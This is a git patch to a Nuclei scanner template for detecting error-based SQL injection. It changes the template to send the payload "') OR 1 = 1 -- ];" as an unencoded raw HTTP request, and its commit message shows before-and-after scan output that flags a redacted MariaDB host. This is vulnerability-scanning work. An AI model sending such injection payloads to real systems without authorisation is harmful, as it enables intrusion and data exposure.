From a3d704752174d47b124f5e35a0a764d9c1f02e1b Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Sat, 20 Mar 2021 19:52:48 +0000
Subject: [PATCH] Update error-based-sql-injection.yaml

Reverting back to raw http request. Sending encoded requests using net/http were missing blatant SQL injections.

Before:

[INF] Loading templates...
[INF] [error-based-sql-injection] Error based SQL injection (@geeknik) [high]
[INF] Loading workflows...
[INF] Using 1 rules (1 templates, 0 workflows)
[INF] No results found. Better luck next time!

After:

[INF] Loading templates...
[INF] [error-based-sql-injection] Error based SQL injection (@geeknik) [high]
[INF] Loading workflows...
[INF] Using 1 rules (1 templates, 0 workflows)
[2021-03-20 14:48:59] [error-based-sql-injection:MariaDB] [http] [high] https://REDACTED/') [check the manual that corresponds to your MariaDB server version]
---
 .../generic/error-based-sql-injection.yaml          | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/vulnerabilities/generic/error-based-sql-injection.yaml b/vulnerabilities/generic/error-based-sql-injection.yaml
index c29169c4fc..3ac783f22c 100644
--- a/vulnerabilities/generic/error-based-sql-injection.yaml
+++ b/vulnerabilities/generic/error-based-sql-injection.yaml
@@ -8,12 +8,13 @@ info:
   tags: sqli
 
 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/') OR 1 = 1 -- ];"
-
-    # Nuclei's use of net/http here will automatically encode the payload, thus sending {{BaseURL}}/%27%29%20OR%201%20=%201%20--%20%5D; as the request
-    # In order to send an unencoded payload, you'll have to make use of the rawhttp library by crafting a raw HTTP request
+  - raw:
+      - |+
+        GET /') OR 1 = 1 -- ];
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+        Accept: */*
+        Connection: close
 
     matchers-condition: and
     matchers: